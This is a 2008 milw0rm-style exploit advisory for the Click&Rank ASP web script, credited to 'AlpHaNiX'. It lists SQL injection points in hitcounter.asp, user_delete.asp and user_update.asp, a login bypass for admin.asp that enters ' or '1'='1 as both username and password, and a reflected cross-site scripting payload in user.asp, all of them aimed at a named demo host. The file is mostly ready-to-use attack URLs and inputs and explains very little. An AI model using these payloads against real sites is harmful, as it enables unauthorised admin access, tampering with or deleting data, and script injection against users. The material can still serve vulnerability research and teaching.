ClickRank SQLXSS Multiple Remote Vulnerabilities.pdf

1 ########################################################################### 2 #−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−AlpHaNiX−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−# 3 ########################################################################### 4 5 #Found By : AlpHaNiX 6 #website : www.offensivetrack.org 7 #contact : AlpHa[AT]HACKER[DOT]BZ 8 9 ########################################################################### 10 11 #script : Click&Rank 12 #download : null 13 #Demo : http://www.icash.ch/index.html?ClickAndRank/default.asp 14 15 ########################################################################### 16 17 #Exploits : 18 19 −−=[SQL INJECTION]=−− 20 http://www.icash.ch/index.html?ClickAndRank/hitcounter.asp?id=(SQL) 21 http://www.icash.ch/index.html?ClickAndRank/user_delete.asp?id=(SQL) 22 http://www.icash.ch/index.html?ClickAndRank/user_update.asp?id=(SQL) 23 24 ########################################################################## 25 26 −−=[AUTH BYPASS]=−− 27 28 http://www.icash.ch/index.html?ClickAndRank/admin.asp 29 30 USERNAME : ’ or ’1’=’1 31 PASSWORD : ’ or ’1’=’1 32 33 34 ########################################################################## 35 36 −−=[Cross Site Scripting]=−− 37 38 http://www.icash.ch/index.html?ClickAndRank/user.asp?action=%22%3E%3Cscript%3Ealert(1);%3C/script%3E 39 40 41 42 #Greetz For My Best Friend ZIGMA 43 44 ########################################################################### 45 46 # milw0rm.com [2008−12−15] Page 1/1 ClickRank SQLXSS Multiple Remote Vulnerabilities AlpHaNiX 12/15/2008